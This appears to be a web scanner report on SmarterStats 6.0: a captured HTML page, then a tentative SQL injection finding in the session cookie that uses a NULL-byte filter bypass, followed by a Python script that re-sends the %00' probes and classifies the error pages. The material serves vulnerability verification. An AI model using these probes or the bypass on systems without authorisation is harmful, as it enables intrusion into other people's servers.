<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Root " dir="ltr">
   
<table id="loadingMessage" class="LoadingMessageTable">
   <tr>
       <td class="LoadingMessageCell">
           <div class="LoadingShadowBox">
               <div class="LoadingMessage">
                   <div class="PageTitle">
                       <div class="RoundedPageTitleLeft">
                           <div class="RoundedPageTitleRight">
                               <img id="ctl00_ctl00_Image1" src="/App_Themes/Default/images/misc/loadingindicator.gif" style="border-width:0px;" />
                               <div class="PageTitleText">
                                   Processing</div>
                           </div>
                       </div>
                   </div>
               </div>
               <div class="RoundedBottom">
                   <div class="RoundedLeft">
                       <div class="RoundedRight">
                           <div class="RoundedBottomLeft">
                               <div class="RoundedBottomRight">
                                   <div class="LoadingMessageInner">
                                       <div class="LoadingMessageText">
                                           SmarterStats is loading...</div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
               </div>
           </div>
       </td>
   </tr>
</table>
<div class="LoadingGlyph" id="TopBarLoading" style="display: none">
   <img id="ctl00_ctl00_Image2" src="/App_Themes/Default/images/misc/loadingindicator.gif" style="border-width:0px;" />
</div>

   <form name="aspnetForm" method="post" action="Default.aspx?section=UserDataMining" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGRZBpvqCZE5Qt1U3wUfSENqgqhOGAd2utwL918rT9feIA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script type="text/javascript">
//<![CDATA[
function ShowHelpRadWindow(){ SpawnHyperWindow('/UserControls/Popups/frmHelp.aspx?url=' + escape(HelpID) + '&extraInfo=' + escape(ExtraHelpID) + '', 330, 200, null); }//]]>
</script>

<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="Services/svcRealTimeService.asmx/js" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$Split$LP$StyledUpdatePanel1',''], ['ctl00$Split$LP$lnkUpdate',''], [], 90, 'ctl00');
//]]>
</script>


       <script type="text/javascript">
           self.GetUpdatesFunc = SSWeb.Services.svcRealTimeService.GetUpdates;
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/root"></script>
       <div class="PageHeader" id="PageHeader">
           <div class="PageHeaderText">
               <div class="PageHeaderActions">
                   
                   <span id="ctl00_HA"><span class="HeaderUserName">weirdo</span> | <span class="HeaderUserName">vilnerable.smarterstats.6.0.host</span> | <span class="HeaderLogOut"><a href="/Logout.aspx" target="_self" >Logout</a></span> | <span class="HeaderHelp"><a href="javascript:ShowHelpRadWindow()">Help</a></span></span>
               </div>
               <div class="PageHeaderVersion" id="PageHeaderVersion">
                   SmarterStats Free 6.0
               </div>
           </div>
       </div>
       
<!-- HyperSplitter -->
<div class='hsOuter ' id='ctl00_Split' style='visibility:hidden'>
<table class='hsContainer' id='ctl00_Split_Container'>
   <tr>
       <td class='hsHorizontal Sidebar' id='ctl00_Split_SB' style='width:46px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_SB_Content'>
               
               <div class="SidebarWrapper"><div id="SidebarScrollUp" class="SidebarScrollUp"><a></a></div><div id="SidebarScroller" class="SidebarScroller">

<div id="SidebarIcon_UserWorkspace" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserWorkspace" href="/Default.aspx?section=UserWorkspace" onclick="UpdateSection('UserWorkspace', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Workspace</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserActivity" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserActivity" href="/Default.aspx?section=UserActivity" onclick="UpdateSection('UserActivity', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_SiteActivity', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Site Activity</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserDemographics" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserDemographics" href="/Default.aspx?section=UserDemographics" onclick="UpdateSection('UserDemographics', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Demographics', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Demographics</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserServerHealth" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserServerHealth" href="/Default.aspx?section=UserServerHealth" onclick="UpdateSection('UserServerHealth', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_ServerHealth', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Server Health</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSpiders" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSpiders" href="/Default.aspx?section=UserSpiders" onclick="UpdateSection('UserSpiders', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Spiders', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Spiders and Bots</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSeo" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSeo" href="/Default.aspx?section=UserSeo" onclick="UpdateSection('UserSeo', '/Client/frmSeoCollections.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>SEO</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserDataMining" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserDataMining" href="/Default.aspx?section=UserDataMining" onclick="UpdateSection('UserDataMining', '/Client/frmDataMineStart.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Data Mining</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSettings" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSettings" href="/Default.aspx?section=UserSettings" onclick="UpdateSection('UserSettings', '/Client/frmUser.aspx?action=mysettings', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Settings</div></div></div>
   </a>
</div>
</div><div id="SidebarScrollDown" class="SidebarScrollDown"><a></a></div></div>

           </div>
       </td>
       <td class='hsHorizontal ' id='ctl00_Split_LP' style='width:250px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_LP_Content'>
               
               <div id="ctl00_Split_LP_StyledUpdatePanel1">
                   
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionHeaderText" class="PageTitleText">
               Settings
           </div>
       </div>
   </div>
</div>
<div id="ButtonBar" class="ButtonBar">
   
<!-- HyperMenu -->
                   <div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuSN' name='ctl00$Split$LP$ctl01$menuSN' style='z-index:800'>
                   </ul>
                   </div>
                   <div class='hmClear'><!-- --></div>
                   
</div>
<div id="LeftScrollable" class="ContentDiv">
   
<!-- HyperTreeView -->
                   <div class='htvTree'><ul class='htvTree' id='ctl00_Split_LP_ctl01_treeNav'>
                       <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv0' TTUID="NAVMySettings" TTUID="treeMySettings" >
                           <div class='htvLineFirst'>
                               <span class='htvToggle htvExpanded'></span>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>My Settings</a>
                           </div>
                           <ul class='htvSub' style='display:block;'>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv0_htv0' TTUID="NAVMySettingsAccountSettings" TTUID="treeMySettingsAccountSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/accountsettings.gif' /><a class='htvA' href='#'>Account Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv0_htv1' TTUID="NAVMySettingsFilterSets" TTUID="treeMySettingsFilterSets" >
                                   <div class='htvLineLast'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/autoresponder.gif' /><a class='htvA' href='#'>Filter Sets</a>
                                   </div>
                               </li>
                           </ul>
                       </li>
                       <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv1' Requires="SITEADMIN" TTUID="NAVSiteSettings" TTUID="treeSiteSettings" >
                           <div class='htvLineLast'>
                               <span class='htvToggle htvExpanded'></span>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>Site Settings</a>
                           </div>
                           <ul class='htvSub' style='display:block;'>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv0' Requires="SITEADMIN" TTUID="NAVSiteSettingsGeneralSettings" TTUID="treeSiteSettingsGeneralSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/domainsettings.gif' /><a class='htvA' href='#'>General Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv1' Requires="SITEADMIN" TTUID="NAVSiteSettingsUsers" TTUID="treeSiteSettingsUsers" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/accountsettings.gif' /><a class='htvA' href='#'>Users</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv2' Requires="ENTERPRISE&#x2c;&#x20;SITEADMIN" TTUID="NAVSiteSettingsEmailSettings" TTUID="treeSiteSettingsEmailSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/PopRetrieval.gif' /><a class='htvA' href='#'>Email Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv3' Requires="SITEADMIN" TTUID="NAVSiteSettingsPageAliases" TTUID="treeSiteSettingsPageAliases" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/aliases.gif' /><a class='htvA' href='#'>Page Aliases</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv5' Requires="SITEADMIN&#x2c;SEOENABLED" TTUID="NAVSiteSettingsSEOSettings" TTUID="treeSiteSettingsSEOSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/protocolsettings.gif' /><a class='htvA' href='#'>SEO Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv6' Requires="SITEADMIN" TTUID="NAVSiteSettingsLogStatus" TTUID="treeSiteSettingsLogStatus" >
                                   <div class='htvLineLast'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/allmessages.gif' /><a class='htvA' href='#'>Log Status</a>
                                   </div>
                               </li>
                           </ul>
                       </li>
                   </ul></div>
                   
</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
</div>


   <script type="text/javascript">
       if (self.ResizeLeftBar) ResizeLeftBar();
   </script>



               </div>
               
               <a id="ctl00_Split_LP_lnkUpdate" href="javascript:__doPostBack(&#39;ctl00$Split$LP$lnkUpdate&#39;,&#39;&#39;)"></a>
               <input type="hidden" name="ctl00$Split$LP$SessionKey" id="ctl00_Split_LP_SessionKey" value="275a2fda26bf41d0a434458863c81036" />
           </div>
       </td>
       <td class='hsHorizontal Splitter' id='ctl00_Split_SplitBar' style='width:2px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_SplitBar_Content'>
               
           </div>
       </td>
       <td class='hsHorizontal ' id='ctl00_Split_Frame' style=''>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_Frame_Content'>
               
               <iframe id="ctl00_Split_Frame_ContentFrame" frameborder="0" scrolling="no" src="/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" style="width: 100%; border: none"></iframe>
               

           </div>
       </td>
   </tr>
</table>
</div>

       <div class="PageFooter" id="PageFooter">
       </div>
       <input type="hidden" name="ctl00$PageTitle" id="ctl00_PageTitle" value=".&#39;&#39;" />
       <input type="hidden" name="ctl00$PanelLoadedState" id="ctl00_PanelLoadedState" value="{}" />

       <script type="text/javascript">
           self.LBHidden = false;
           var panelLoadedStateObj = $get('ctl00_PanelLoadedState');
           var processingText = "Processing";
           var loadingText = "SmarterStats is loading...";
           var currentSection = 'UserSettings';
           var sidebarHeight = 0;
           var firstResize = true;
           var pageTitleId = 'ctl00_PageTitle';
           var $sup = $('#ctl00_Split_LP_StyledUpdatePanel1');
           var $scrollers = $('#SidebarScrollUp, #SidebarScrollDown');
           var $splitter = $('#ctl00_Split');
           var $sbs = $('#SidebarScroller');
           var $sbw = $sbs.parent();
           var $sbwp = $sbw.parent();
           var _extContentElement = $get('ctl00_Split_Frame_ContentFrame');
           function GetSMPane() { return self; }
           function Update(name) {
               $get(pageTitleId).value = document.title;
               SetCookieValue("TopBarSection", name);
               __doPostBack('ctl00$Split$LP$lnkUpdate',name + "|" + currentPage);
               currentSection = name;
               UpdateHash();
           }
           NavigateToHash();
           function HideLeftBar(val) {
               if (val === undefined) return;
               if (self.LBHidden == val) return;
               self.LBHidden = val;
               if (val) $('#ctl00_Split_LP, #ctl00_Split_SplitBar').HideHyperPane();
               else $('#ctl00_Split_LP, #ctl00_Split_SplitBar').ShowHyperPane();
               UpdateHash();
           }
           function SplitterResized() {
               ResizeLeftBar(true);
               ResizeIframes();
           }
           function ResizeLeftBar(setWidth) {
               if (firstResize) {
                   firstResize = false;
                   $scrollers.hide();
                   sidebarHeight = $sbs.outerHeight();
                   $sbw.height(sidebarHeight);
                   InitSidebarSliders();
               }

               $sup.ResizeToFit();
               var $ls = $('#LeftScrollable');
               $ls.parent().css('overflow','hidden');
               $ls.ResizeToFit();
               $ls.parent().css('overflow','visible');

               if (setWidth) {
                   var width = $sup.GetResizedWidth();
                   $sup.width(width);
                   $ls.width(width);
               }
               if (self.AdditionalResizeLeftBar) self.AdditionalResizeLeftBar();

               if ($sbwp.innerHeight() < sidebarHeight) {
                   $scrollers.show();
                   $sbw.ResizeToFit();
                   $sbs.ResizeToFit();
               }
               else if ($scrollers.is(':visible')) {
                   $scrollers.hide();
                   $sbw.height(sidebarHeight);
                   $sbs.height(sidebarHeight);
                   $sbs.scrollTop(0);
               }
           }
           function InitSidebarSliders() {
               var animationTime = self.EnableAnimations ? 150 : 0;
               $('.SidebarSlider').each(function() {
                   var control = $(this);
                   var wrapper = control.parent();
                   var parent = control.parent().parent();
                   var off = parent.offset();
                   control.children('div').css('float','none');
                   var width = control.innerWidth(true);
                   control.children('div').css('float','right');
                   control.add(wrapper).css({ top: off.top - 1, left: off.left + parent.outerWidth(true), width: 0, visibility: 'visible'}).hide();
                   var timer;
                   parent.hover(function() {
                       clearTimeout(timer);
                       parent.addClass('SidebarAnchorHover');
                       var off = parent.offset();
                       control.add(wrapper).css({ top: off.top - 1});
                       control.add(wrapper).stop().show().animate({ width: width}, animationTime, function () { wrapper.width(width+1); });
                   }, function() {
                       clearTimeout(timer);
                       timer = setTimeout(function () { control.add(wrapper).stop().animate({ width: 0}, animationTime, function () { control.add(wrapper).hide(); parent.removeClass('SidebarAnchorHover'); }); } , 66);
                   });
               });
           }
           function DoResize() {
               $splitter.ResizeHyperSplitter();
               ResizeLeftBar();
               ResizeIframes();
           }
           $(window).resize(function() { clearTimeout(self.resizeDelay); self.resizeDelay = setTimeout(DoResize, 100); });
           $(window).load(function() {
               InitAjaxHandlers();
               ShowSection(currentSection, currentSection);
               Initialize();
               DoResize();
               setTimeout(function() { $('#loadingMessage').hide(); }, self.isNavigatingToHash ? 500 : 250);
           });
       </script>

       
       
<div id="ConfirmWindow" class="ConfirmWindow" style="display: none">
   <div id="DivConfirmContent" class="ConfirmContent">
       <div class="ConfirmNote" id="ConfirmText">
           &nbsp;
       </div>
   </div>
   <div id="ctl00_DC1_Button" class="PopupButtons">
       <div class="ButtonBarRight">
           <span id="CancelButtonWrapper">
               <div id="ctl00_DC1_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CancelPopup();; return false;"><span class="BBInner">Cancel</span></a></div>
           </span>
           <div id="ctl00_DC1_SaveButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OKPopup();; return false;"><span class="BBInner">OK</span></a></div>
       </div>
   </div>
   <span id="MessageHeaderText" style="display: none">
       Message</span>
   <input style="position: absolute; top: -1000px;" id="DeleteKeyCaptureBox" />

   <script type="text/javascript">
       function GetConfirmTitle() {
           return $('#MessageHeaderText').html();
       }
       function ShowAlert(errorMessage) {
           $('#CancelButtonWrapper').css('display', 'none');
           $('#ConfirmText').html(errorMessage).css('display', '');
       }
       function ShowConfirm(type, size) {
           var displayText = confirmationDialogKeys[type];
           if (displayText == undefined) displayText = type;
           $('#CancelButtonWrapper').css('display', '');
           $('#ConfirmText').html(displayText.replace(/\{0\}/g, size.toString()));
           $('#DeleteConfirmCount').html(size.toString());
       }
       function CancelPopup() {
           parent.ConfirmCallback(false);
           ClosePopup();
       }
       function OKPopup() {
           parent.ConfirmCallback(true);
           ClosePopup();
       }
       $('#DeleteKeyCaptureBox').live('keydown', function(evt) {
           CancelEvent(evt);
           if ($('#ConfirmWindowModal').attr('display') == 'none') return;
           if (evt.keyCode == 13 || evt.which == 13) OKPopup();
           else if (evt.keyCode == 27 || evt.which == 27) CancelPopup();
           return false;
       });
   </script>

</div>

       
   

<script type="text/javascript">
//<![CDATA[
ClearTreeToggle();
SidebarAjaxLoaded();if (self.LeftBarReady) self.LeftBarReady();$(function() { $('#ctl00_Split').hyperSplitter({"IsHorizontal":true,"Panes":[{"Resizable":false,"SplitBar":false,"MinWidth":46,"MaxWidth":46,"Width":46,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_SB"},{"Resizable":true,"SplitBar":false,"MinWidth":185,"MaxWidth":300,"Width":250,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":"RootLPSize","_ClientID":"ctl00_Split_LP"},{"Resizable":false,"SplitBar":true,"MinWidth":2,"MaxWidth":2,"Width":2,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_SplitBar"},{"Resizable":false,"SplitBar":false,"MinWidth":0,"MaxWidth":0,"Width":0,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_Frame"}]}); });
$(function() { $('#ctl00_Split_LP_ctl01_menuSN').hyperMenu({"ClearFloat":true,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_LP_ctl01_menuSN_menuGlobalNew":"return false;"},"ClientCallbacks":{}}); });
$(function() { $('#ctl00_Split_LP_ctl01_treeNav').hyperTreeView({"imagePath":"/App_Themes/Default/Images/16x16/","NoLines":false,"ContextMenuID":null,"FunctionMap":{"ctl00_Split_LP_ctl01_treeNav_htv0_htv0":"UpdateFrame(\u0027\\x2fClient\\x2ffrmUser\\x2easpx\\x3faction\\x3dmysettings\u0027);","ctl00_Split_LP_ctl01_treeNav_htv0_htv1":"UpdateFrame(\u0027\\x2fClient\\x2ffrmFilterSets\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv0":"UpdateFrame(\u0027\\x2fClient\\x2ffrmImportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv1":"UpdateFrame(\u0027\\x2fClient\\x2ffrmUsers\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv2":"UpdateFrame(\u0027\\x2fClient\\x2ffrmEmailReportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv3":"UpdateFrame(\u0027\\x2fClient\\x2ffrmPageAliases\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv4":"UpdateFrame(\u0027\\x2fClient\\x2ffrmSkins\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv5":"UpdateFrame(\u0027\\x2fClient\\x2ffrmSeoSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv6":"UpdateFrame(\u0027\\x2fClient\\x2ffrmLogsImported\\x2easpx\u0027);"},"ClientCallbacks":{"onExpand":"RecordTreeExpanded","onCollapse":"RecordTreeCollapsed"}}); });
//]]>
</script>
</form>
</body>
</html>


2.5. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASP.NET_SessionId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In this case the error in Response 1 is a System.InvalidOperationException ("Collection was modified; enumeration operation may not execute") thrown from XmlSchemas.Compile while the .asmx help page was being generated, not a database-provider exception, and Response 1 and Response 2 carry the same Date header, so the two probes were sent at about the same time. Repeat the single-quote probe on its own and treat the finding as SQL injection only if a reproducible database error (for example a System.Data.SqlClient.SqlException) is returned.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is protected by a web application firewall (WAF) or input filter written in native code, where strings are NULL-terminated: the filter stops reading at the %00 and never sees the characters after it, while the managed application receives the whole value. Fix the actual vulnerability within the application code (parameterised queries rather than string concatenation), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
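To confirm or dismiss a tentative finding like this one, the check below re-runs the quote / two-quote differential from Request 1 and Request 2 and classifies the ASP.NET error page by exception type, so that an exception unrelated to the database (as in Response 1) is kept apart from a provider error; it also shows why the %00 prefix hides the quote from a NULL-terminated native-code filter while the application still receives it. This is an added example written for this report, not code from SmarterTools or from the scanner; the host, the provider error sample and the live re-test are assumptions, while the cookie value and payloads are those recorded in Request 1 and Request 2.

```python
"""
Added example, not code from the SmarterStats report or from SmarterTools.

Re-runs the check behind finding 2.5 (single quote vs. two single quotes after a
%00 byte in ASP.NET_SessionId) and classifies the resulting ASP.NET error page so a
non-database exception, such as the InvalidOperationException in Response 1, is not
mistaken for a SQL error. Also shows why %00 defeats a filter written in native
code: a NUL-terminated view of the cookie stops before the quote.
Assumptions: the target host, the SQL error sample and the provider regex.
"""
import ctypes
import re
import urllib.error
import urllib.parse
import urllib.request

SESSION_ID = "ijbzrxuei0fhzn5qh4jllhd4"              # from Request 1
PAYLOADS = {"quote": "%00'", "two_quotes": "%00''"}  # from Request 1 / Request 2

# ADO.NET provider exceptions and SQL Server syntax messages that show the input
# reached a database (assumed list; extend for other providers).
SQL_ERROR_RE = re.compile(
    r"System\.Data\.(?:SqlClient\.SqlException|OleDb\.OleDbException|Odbc\.OdbcException)"
    r"|Unclosed quotation mark|Incorrect syntax near",
    re.I,
)
# Exception type named on the ASP.NET "Server Error in '/' Application" page.
ANY_EXCEPTION_RE = re.compile(r"Exception Details:\s*</b>\s*([\w.]+Exception)", re.I)


def classify(status, body):
    """Label one response: ('sql_error'|'other_exception'|'error_no_detail'|'ok', detail)."""
    m = SQL_ERROR_RE.search(body)
    if m:
        return "sql_error", m.group(0)
    m = ANY_EXCEPTION_RE.search(body)
    if m:
        return "other_exception", m.group(1)
    if status >= 500:
        return "error_no_detail", None
    return "ok", None


def verdict(quote_resp, two_quotes_resp, quote_repeats=()):
    """
    Apply the quote/two-quote differential to (status, body) pairs.
    quote_repeats: further responses to the %00' probe, sent one at a time, used to
    reject an error that does not reproduce (e.g. a concurrency fault in the server).
    """
    kind_q, _ = classify(*quote_resp)
    kind_qq, _ = classify(*two_quotes_resp)
    if kind_q == "ok":
        return "no_differential"
    if kind_qq != "ok":
        return "error_independent_of_quotes"
    if any(classify(*r)[0] != kind_q for r in quote_repeats):
        return "nondeterministic_error"
    return "likely_sqli" if kind_q == "sql_error" else "differential_but_non_sql_error"


def native_view(cookie_value):
    """The decoded cookie as a NUL-terminated C string sees it: truncated at %00."""
    raw = urllib.parse.unquote_to_bytes(cookie_value)
    return ctypes.c_char_p(raw).value


def managed_view(cookie_value):
    """The decoded cookie as a length-counted (.NET/Python) string sees it: intact."""
    return urllib.parse.unquote(cookie_value)


def probe(base_url, payload, timeout=10):
    """Send the GET from finding 2.5 with `payload` appended to ASP.NET_SessionId."""
    req = urllib.request.Request(
        base_url + "/Services/SiteAdmin.asmx?op=GetAllSites2",
        headers={
            "Cookie": f"ASP.NET_SessionId={SESSION_ID}{payload}",
            "User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return r.getcode(), r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


# Excerpt of Response 1 from the report (status 500, InvalidOperationException).
RESPONSE_1 = (500, "<b> Exception Details: </b>System.InvalidOperationException: "
                   "Collection was modified; enumeration operation may not execute.<br>")
# Excerpt of Response 2 from the report (status 200, normal help page).
RESPONSE_2 = (200, "<title>\n   SiteAdmin Web Service\n</title>")
# Constructed sample of a real ADO.NET quote error (assumed, not observed on this host).
SQL_ERROR_SAMPLE = (500, "<b> Exception Details: </b>System.Data.SqlClient.SqlException: "
                         "Unclosed quotation mark after the character string ''.<br>")


def report_verdict():
    """Verdict for the two responses recorded in finding 2.5."""
    return verdict(RESPONSE_1, RESPONSE_2)


if __name__ == "__main__":
    print("finding 2.5 as recorded:", report_verdict())
    print("native filter sees:", native_view(SESSION_ID + PAYLOADS["quote"]))
    print("application sees:  ", repr(managed_view(SESSION_ID + PAYLOADS["quote"])))
    # Live re-test (assumed host; only against a system you are authorised to test):
    # base = "http://vulnerable.smarterstats.6.0.host:9999"
    # q, qq = probe(base, PAYLOADS["quote"]), probe(base, PAYLOADS["two_quotes"])
    # print(verdict(q, qq, [probe(base, PAYLOADS["quote"]) for _ in range(3)]))
```

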